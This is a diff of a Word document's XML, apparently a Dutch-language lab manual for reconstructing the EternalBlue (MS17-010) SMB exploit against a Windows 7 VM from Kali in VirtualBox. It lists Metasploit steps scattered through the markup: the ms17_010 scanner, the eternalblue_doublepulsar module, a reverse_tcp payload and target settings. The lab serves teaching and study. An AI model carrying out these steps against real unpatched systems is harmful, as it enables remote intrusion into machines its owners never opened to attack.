+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Handleiding</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Setup.ps1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Installeert de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VM’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Virtualbox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Directory VDI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Lege directory: hier worden de gedownloade </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VDI’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> geplaatst voor het uitvoeren van het setup script.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -1323,6 +1619,151 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Om de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> correct na te bootsen is een kwetsbare versie van Windows nodig. Vrijwel elke Windows versie uitgebracht voor 2017 bevat de kwetsbaarheid. Voor de reconstructie van deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hebben we gekozen voor ‘Windows 7 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Ultimate SP1 (64bit)’.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Aangezien osboxes.org geen Windows </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VDI’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of images aanbiedt, gebruiken we een persoonlijk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kopie van Windows 7.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: We voorzien een vooraf geconfigureerde VDI van Kali 2023.4. Het is ook mogelijk de VDI van osboxes.org te downloaden, in dit geval moeten er nog enkele configuratiestappen gevolgd worden voor de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kan uitgevoerd worden. Deze stappen zijn te vinden in BIJLAGE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1397,7 +1838,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Kali: </w:t>
+        <w:t>Kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2023.4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
@@ -1426,7 +1879,19 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Windows:</w:t>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1442,7 +1907,25 @@
             <w:szCs w:val="20"/>
             <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
+          <w:t>https://1drv.ms/u/s</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>!</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -1486,22 +1969,317 @@
           <w:numId w:val="3"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Run het Setup.ps1 script.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Run het </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Setup.ps1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: rechterklik -&gt; voer uit met </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Beide </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VM’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> worden </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>geïnstalleerd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Windows VM:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Windows </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + R</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ipconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Noteer het IPv4-adres van de Windows VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Kali VM:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Open terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Noteer het IPv4 adres van de Kali VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1514,6 +2292,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Exploit</w:t>
       </w:r>
     </w:p>
@@ -1534,14 +2313,18 @@
         </w:rPr>
         <w:t xml:space="preserve">Start </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1570,6 +2353,77 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vermijd het gebruik van </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. De </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maakt gebruik van Wine, volgens veel bronnen is Wine met </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>rights</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> een slecht idee!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -1582,7 +2436,73 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Scan for vulnerability</w:t>
+        <w:t xml:space="preserve">Scan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De scanner die </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ierna g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ebruikt wordt bekijkt of een target machine kwetsbaar is voor onze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1622,8 +2542,18 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>/smb_ms17_010</w:t>
-      </w:r>
+        <w:t>/smb_ms17_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>010</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1704,6 +2634,12 @@
         </w:rPr>
         <w:t>Configure payload</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1751,9 +2687,19 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>reverse_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1863,9 +2809,19 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>eternalblue_doublepulsar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>eternalblue_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>doublepulsar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1913,9 +2869,19 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>reverse_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2060,8 +3026,18 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>set TARGETARCHITECTURE x64</w:t>
-      </w:r>
+        <w:t xml:space="preserve">set TARGETARCHITECTURE </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x64</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2160,13 +3136,23 @@
         <w:t>osboxes</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>/.wine/</w:t>
+        <w:t>/.wine</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2202,7 +3188,13 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Run exploit</w:t>
+        <w:t xml:space="preserve">Run </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exploit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2242,8 +3234,25 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Shutdown Windows</w:t>
+        <w:t>Shut</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>down Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2271,21 +3280,207 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
